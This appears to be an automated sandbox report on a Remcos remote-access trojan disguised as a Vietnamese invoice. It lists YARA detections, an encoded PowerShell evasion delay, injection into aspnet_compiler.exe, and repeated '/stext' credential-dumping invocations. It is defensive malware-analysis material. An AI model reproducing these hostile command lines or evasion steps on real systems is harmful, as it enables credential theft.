              Source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
              Source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
              Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36d8660.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36d8660.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
              Source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
              Source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
              Source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
              Source: 0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000000.00000002.357319262.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000000.00000002.357530014.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000000.00000002.355401113.00000000025D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
              Source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
              Source: Process Memory Space: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe PID: 3988, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: aspnet_compiler.exe PID: 3660, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00416760 appears 69 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,14_2_0040DD85
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_00401806 NtdllDefWindowProc_W,14_2_00401806
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_004018C0 NtdllDefWindowProc_W,14_2_004018C0
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000000.251222049.0000000000182000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCgfcxatykt.exe" vs Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.365213489.0000000007610000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameVgnaaeoogibheqcdzitcbxs.dll" vs Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.354759645.00000000024F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000003.271856566.0000000003772000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVgnaaeoogibheqcdzitcbxs.dll" vs Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeBinary or memory string: OriginalFilenameCgfcxatykt.exe" vs Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeFile created: C:\Users\user\AppData\Roaming\YqxsvaorwniJump to behavior
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@65/22@19/5
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,14_2_004182CE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,14_2_0040B58D
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeReversingLabs: Detection: 27%
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeVirustotal: Detection: 30%
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeFile read: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jzlrsem"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jzlrsem"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\ubrkswxpfz"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\evectoiqthdfs"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Users\user\AppData\Local\Temp\dwn.exe "C:\Users\user\AppData\Local\Temp\dwn.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe "C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\ixjslbemgsufoiuudk"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\tzolmupfuamrqwiynvqal"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\tzolmupfuamrqwiynvqal"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe "C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\xbsbmhljhlcrmkvfybyknsbrlg"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\ivyunzdcvtueoyrjhmkmqwoatvkpua"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\sxdnnkoerbmjyegnzxxfbjirubcqnlslo"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\sxdnnkoerbmjyegnzxxfbjirubcqnlslo"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\xzhdfxk"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\huvvgpvbsu"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jwaohifvgcnaz"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jwaohifvgcnaz"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\bbmbgkgdsftq"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\mvrmgcrxgnlvkuc"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\wyeehvbyuvdiuiytom"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\odqrgxczfqkyvjblz"
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jzlrsem"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jzlrsem"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\ubrkswxpfz"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\evectoiqthdfs"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Users\user\AppData\Local\Temp\dwn.exe "C:\Users\user\AppData\Local\Temp\dwn.exe" Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\ixjslbemgsufoiuudk"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\tzolmupfuamrqwiynvqal"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\tzolmupfuamrqwiynvqal"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"Jump to behavior
